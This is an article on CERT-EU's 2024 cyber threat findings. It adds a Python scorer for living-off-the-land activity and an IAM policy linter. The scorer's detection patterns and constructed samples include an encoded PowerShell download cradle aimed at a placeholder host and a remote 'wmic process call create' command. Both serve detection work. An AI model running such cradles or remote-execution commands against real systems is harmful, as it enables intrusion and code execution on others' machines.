Deep Dive: Analyzing the 2024 Cyber Threat Landscape and Emerging Attack Vectors


Introduction

The year 2024 witnessed a dynamic and increasingly sophisticated cyber threat landscape, with significant implications for organizations, particularly those within the European Union. CERT-EU's comprehensive analysis of malicious activities targeting Union entities and their vicinity reveals key trends, prevalent techniques, and the most vulnerable sectors. This article delves into these findings, providing a technical breakdown of the observed threats and offering insights for proactive defense strategies.

Key Findings and Trends

  • Elevated Cyberespionage and Prepositioning: A staggering 44% of malicious activities analyzed were classified as cyberespionage or prepositioning, indicating a focus on long-term covert access by state-backed actors.
  • Zero-Day Exploitation: Union entities experienced 15 significant incidents, with five involving the exploitation of zero-day vulnerabilities, highlighting the need for rapid response and patching capabilities.
  • Service Providers as Prime Targets: Threat actors actively targeted service providers, including telecommunications, cybersecurity firms, and remote access providers, underscoring the importance of robust supply chain monitoring.
  • Geopolitical Events as Catalysts: Cyberattacks frequently coincided with global events such as elections, conflicts, and major international conferences, demonstrating the close link between geopolitical developments and cyber threats.

Threat Actors and Their Motives

In 2024, CERT-EU identified 110 threat actors active against Union entities or their vicinity. The level of exposure varied:

  • Critical Exposure: 20 threat actors successfully breached Union entities.
  • High Exposure: 20 threat actors targeted Union entities but failed to intrude.
  • Medium Exposure: 23 threat actors attempted to scan the networks of Union entities.
  • Low Exposure: 47 threat actors targeted the vicinity of Union entities.

The primary motive for these actors was cyberespionage (44%), followed by cybercrime (20%), hacktivism, and information operations. Where the origin of the attacks could be determined, the largest shares were linked to Russia (50%) and China (28%), followed by Iran and North Korea.

Techniques and Attack Vectors

The report identifies several recurring techniques that shaped the threat landscape:

  • Operational Relay Box (ORB) Networks: Threat actors used ORBs, composed of compromised devices like SOHO routers and IP cameras, to obscure their activities and complicate attribution. For example, the China-linked Volt Typhoon exploited legacy vulnerabilities in Cisco and Netgear routers to establish ORB networks.
  • Exploitation of Public-Facing Applications and Edge Devices: APT groups targeted internet-facing systems and edge devices like VPN appliances and firewalls to gain initial access. Vulnerabilities in products like Fortinet FortiGate, Cisco ASA, and Ivanti Connect Secure were actively exploited.
  • Adversary-in-the-Middle (AitM) Attacks: AitM attacks were used to intercept and manipulate communication sessions, bypassing multi-factor authentication (MFA) and other security controls.
  • Living-off-the-Land (LoL) Techniques: Threat actors minimized their footprint by using legitimate system tools like PowerShell and WMI instead of deploying custom malware.
  • Cloud-Based Persistence and API Abuse: Attackers exploited weak API security, misconfigured IAM policies, and exposed cloud secrets to move laterally within cloud environments. The US government experienced a breach via exploited vulnerabilities in BeyondTrust's software.
  • Supply Chain Compromise: APT groups infiltrated third-party vendors and software providers to reach their targets. The Justice AV Solutions Viewer software was compromised via a backdoor.
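The Living-off-the-Land bullet above is the one a detection engineer can act on most directly: because the tooling (PowerShell, WMI, cmd) is legitimate, detection has to key on how it is invoked and by whom, not on the binary itself. The script below is an added example and is not code from the CERT-EU report; it scores constructed process-creation records (field names modelled loosely on Sysmon/EDR telemetry, which is an assumption) for the usual LoL indicators: encoded and hidden PowerShell, download cradles, Office applications spawning script hosts, the WMI provider host spawning a shell, and `wmic /node:` remote process creation. The indicator weights and the alert threshold are illustrative choices, not published values.

```python
"""Score process-creation events for living-off-the-land indicators.

Added example, not from the CERT-EU report. The events below are constructed
test data; the field layout and indicator weights are assumptions.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Detection patterns (all case-insensitive).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:enc|e|ec|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
BYPASS = re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass")
CRADLE = re.compile(
    r"(?i)\b(?:IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b"
    r"|Net\.WebClient"
)
OFFICE = re.compile(r"(?i)(?:winword|excel|powerpnt|outlook)\.exe$")
SCRIPT_HOSTS = re.compile(r"(?i)(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)\.exe$")
WMI_REMOTE = re.compile(r"(?i)wmic(?:\.exe)?\s+.*?/node:")

# Constructed payload for the encoded-command sample; example.invalid is a
# reserved, non-resolving domain, so this string is inert.
_CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_CRADLE_TEXT.encode("utf-16-le")).decode()

# Constructed sample telemetry (not real incident data).
SAMPLE_EVENTS = [
    ProcessEvent("ws01", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile Get-ChildItem C:\Users"),
    ProcessEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -ep bypass -enc " + _ENCODED),
    ProcessEvent("srv03", r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                 r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c whoami /all"),
    ProcessEvent("ws04", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic /node:fileserver01 process call create "cmd.exe /c net user"'),
]


def decode_encoded_command(command_line):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    cmd = event.command_line
    decoded = decode_encoded_command(cmd)
    # Inspect the decoded payload as well, so obfuscation does not hide the cradle.
    inspect = cmd if decoded is None else cmd + " " + decoded
    if decoded is not None:
        score += 3; reasons.append("encoded PowerShell command")
    if HIDDEN.search(cmd):
        score += 2; reasons.append("hidden window")
    if BYPASS.search(cmd):
        score += 2; reasons.append("execution policy bypass")
    if CRADLE.search(inspect):
        score += 3; reasons.append("download cradle / in-memory execution")
    if OFFICE.search(event.parent_image) and SCRIPT_HOSTS.search(event.image):
        score += 4; reasons.append("Office application spawned a script host")
    if event.parent_image.lower().endswith("wmiprvse.exe") and SCRIPT_HOSTS.search(event.image):
        score += 4; reasons.append("WMI provider host spawned a shell (remote WMI execution)")
    if WMI_REMOTE.search(cmd):
        score += 4; reasons.append("wmic remote process creation")
    return score, reasons


def triage(events, threshold=4):
    """Return (host, score, reasons) for events at or above the threshold, highest first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.host, score, reasons))
    return sorted(hits, key=lambda h: -h[1])


if __name__ == "__main__":
    for host, score, reasons in triage(SAMPLE_EVENTS):
        print(f"{host:6} score={score:2}  " + "; ".join(reasons))
```

The point of inspecting the decoded payload as well as the raw command line is that `-EncodedCommand` is exactly how LoL tradecraft hides a cradle from naive string matching; the parent/child pairing rules are what separate an administrator's interactive PowerShell from a document-delivered one.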

Targeted Sectors

Besides public administration, the most commonly targeted sectors were defence, transportation, and technology. The finance sector was also frequently targeted, often by hacktivist groups. Diplomatic entities remained a focal point for cyberespionage campaigns.

  • Defence: The ongoing conflicts increased the attractiveness of this sector for threat actors seeking sensitive information related to weapon development and military communications.
  • Transportation: This sector, including maritime, air, and rail transportation, was targeted by cyberespionage, cybercrime, and hacktivist groups.
  • Technology: Malicious actors targeted the technology industry due to its role in the supply chain, seeking to infiltrate downstream clients.

Software Vulnerabilities and Exploitations

In 2024, 110 software products were targeted. Exploitation of internet-facing software products remained a primary initial access vector.

  • Microsoft: Multiple high-impact vulnerabilities across Microsoft products and protocols, including Windows, NTLMv2 authentication, and Microsoft 365, were exploited.
  • Ivanti: Ivanti's Connect Secure and Policy Secure solutions were targeted with remote code execution, authentication bypass, and privilege escalation vulnerabilities.
  • Apple: Apple disclosed multiple vulnerabilities affecting iOS, iPadOS, macOS, and tvOS.
  • Google: Multiple Chrome vulnerabilities were exploited, enabling remote code execution and privilege escalation.
  • Palo Alto Networks: Vulnerabilities in PAN-OS were exploited to execute remote code and escalate privileges.

Service Provider Vulnerabilities

Service providers are prime targets for threat actors because vendors of remote access tools, endpoint security, or VPN services are vital to many organizations at once. Software vendors and cloud service operators were frequently targeted, and telecommunication and Internet Service Providers (ISPs) control vast networks and often store personal data for millions of users.

Proactive Defense Strategies

Based on the 2024 threat landscape, organizations should adopt proactive defense strategies:

  • Prioritize Patching: Rapidly address known vulnerabilities in internet-facing applications, edge devices, and software products, especially zero-day vulnerabilities.
  • Implement Robust Supply Chain Security: Monitor third-party vendors and service providers for potential compromises.
  • Enhance Network Security: Implement network segmentation, intrusion detection systems, and strong perimeter controls to detect and prevent unauthorized access.
  • Strengthen Authentication Mechanisms: Enforce multi-factor authentication (MFA) and monitor for potential AitM attacks.
  • Harden Cloud Environments: Implement strong IAM policies, monitor for API abuse, and secure cloud storage buckets.
  • Employee Training: Educate employees about spearphishing and social engineering tactics.
  • Threat Intelligence: Continuously monitor the threat landscape and adapt security measures to address emerging threats and techniques.
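"Harden Cloud Environments: implement strong IAM policies" is easy to state and hard to audit by eye, and the "Cloud-Based Persistence and API Abuse" technique above shows what a misconfigured policy buys an attacker. The following linter is an added example and not part of the CERT-EU report: it checks AWS-style IAM policy documents (the Statement/Effect/Action/Resource/Principal grammar) for the misconfigurations most often behind cloud persistence, and shows a weak role policy and bucket policy beside hardened equivalents. The rule set, the policy documents, the bucket name and the account ID are constructed for illustration.

```python
"""Lint IAM-style policy documents for common over-permissioning.

Added example, not from the CERT-EU report. Policies and rules are
constructed; the account ID 123456789012 is a placeholder.
"""
import json

# Actions that, granted on every resource, let a principal mint new
# credentials or attach further privileges (well-known IAM escalation paths).
PRIVILEGE_ESCALATION_ACTIONS = {
    "iam:passrole", "iam:createaccesskey", "iam:attachuserpolicy",
    "iam:putuserpolicy", "sts:assumerole",
}


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_wildcard(values):
    return any(v == "*" for v in values)


def _principal_is_public(principal):
    """Principal may be "*" or {"AWS": "*"} / {"AWS": ["*", ...]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(_is_wildcard(_as_list(v)) for v in principal.values())
    return False


def lint_policy(policy):
    """Return a list of (sid, severity, message) findings for one policy document."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements cannot over-grant
        sid = stmt.get("Sid", f"statement[{idx}]")
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        has_condition = bool(stmt.get("Condition"))

        if _is_wildcard(actions) and _is_wildcard(resources):
            findings.append((sid, "HIGH", "Allow */* grants full administrative access"))
        elif _is_wildcard(resources) and any(a.endswith(":*") for a in actions):
            findings.append((sid, "HIGH", "service-wide wildcard action on every resource"))

        # Resource policies (e.g. S3 bucket policies) carry a Principal; an anonymous
        # principal with no Condition is a public bucket.
        if "Principal" in stmt and _principal_is_public(stmt["Principal"]) and not has_condition:
            findings.append((sid, "HIGH", "anonymous principal without a Condition (public access)"))

        for action in actions:
            if action.lower() in PRIVILEGE_ESCALATION_ACTIONS and _is_wildcard(resources):
                findings.append((sid, "MEDIUM", f"{action} on every resource enables privilege escalation"))
    return findings


# Constructed weak policies (the kind of misconfiguration to look for).
WEAK_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "AdminEverything", "Effect": "Allow", "Action": "*", "Resource": "*"},
        {"Sid": "KeysForAnyone", "Effect": "Allow",
         "Action": ["iam:CreateAccessKey", "iam:PassRole"], "Resource": "*"},
    ],
}
WEAK_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-data-bucket/*"}],
}

# Constructed hardened equivalents: least privilege, named principal, scoped PassRole.
HARDENED_ROLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReadOneBucket", "Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-data-bucket", "arn:aws:s3:::example-data-bucket/*"]},
        {"Sid": "PassOnlyAppRole", "Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/app-runtime",
         "Condition": {"StringEquals": {"iam:PassedToService": "ecs-tasks.amazonaws.com"}}},
    ],
}
HARDENED_BUCKET_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{"Sid": "AppRoleRead", "Effect": "Allow",
                   "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-runtime"},
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-data-bucket/*"}],
}


if __name__ == "__main__":
    for name, policy in [("weak role", WEAK_ROLE_POLICY), ("weak bucket", WEAK_BUCKET_POLICY),
                         ("hardened role", HARDENED_ROLE_POLICY), ("hardened bucket", HARDENED_BUCKET_POLICY)]:
        print(name, json.dumps(lint_policy(policy)))
```

Running the linter in CI against every policy document before it is applied turns the "strong IAM policies" recommendation into a gate; the same rules can be run against exported policies to find existing wildcard grants and public buckets that an intruder would use to persist.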

Conclusion

The cyber threat landscape of 2024 was characterized by increased sophistication, a focus on cyberespionage, and the exploitation of service providers and critical software vulnerabilities. By understanding the key trends, techniques, and targeted sectors, organizations can develop proactive defense strategies to mitigate risks and protect their assets. Continuous monitoring, rapid incident response, and robust security controls are essential for navigating the evolving threat landscape and maintaining a strong security posture.
